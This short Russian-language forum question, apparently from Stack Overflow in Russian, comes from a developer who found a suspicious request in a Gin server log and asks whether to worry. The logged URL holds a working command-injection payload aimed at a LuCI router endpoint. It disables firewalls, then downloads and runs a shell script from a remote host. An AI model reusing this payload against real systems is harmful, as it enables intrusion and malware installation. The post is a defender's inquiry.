Странные запросы на сервер(cgi-bin запросы и cgi-bin уязвимость)
Обнаружил, что на публичный сервер в нашем новомодном айти стартапчике поступали странные запросы, видимо, автоматические какие-то. Объясните пожалуйста что это может быть?
[GIN] 2023/08/23 - 11:49:28
| 404 | 6.885µs | ip клиента(палить не буду, локация США)
| GET "/cgi-bin/luci/;stok=/locale?
form=country&operation=write&country=$(cd%20/tmp
%3Brm%20zizuo.sh%3Brm%20-rf%20zizuo.sh
%3Bufw%20disable%3Bsystemctl%20stop%20firewalld.service
%3Bsystemctl%20stop%20firewalld%3Bservice
%20iptables%C2%A0stop%3Bwget%20http%3A
//(тут тоже был ip , локация Нидерланды)/zizuo.sh%3Bchmod
%20777%20zizuo.sh%3Bsh%20zizuo.sh)"
Стоит ли мне проанализировать ситуацию(если да, то как)? Стоит ли париться за безопасность? И хорошо ли что мы отвечаем 404 таким ребятам?
Источник: Stack Overflow на русском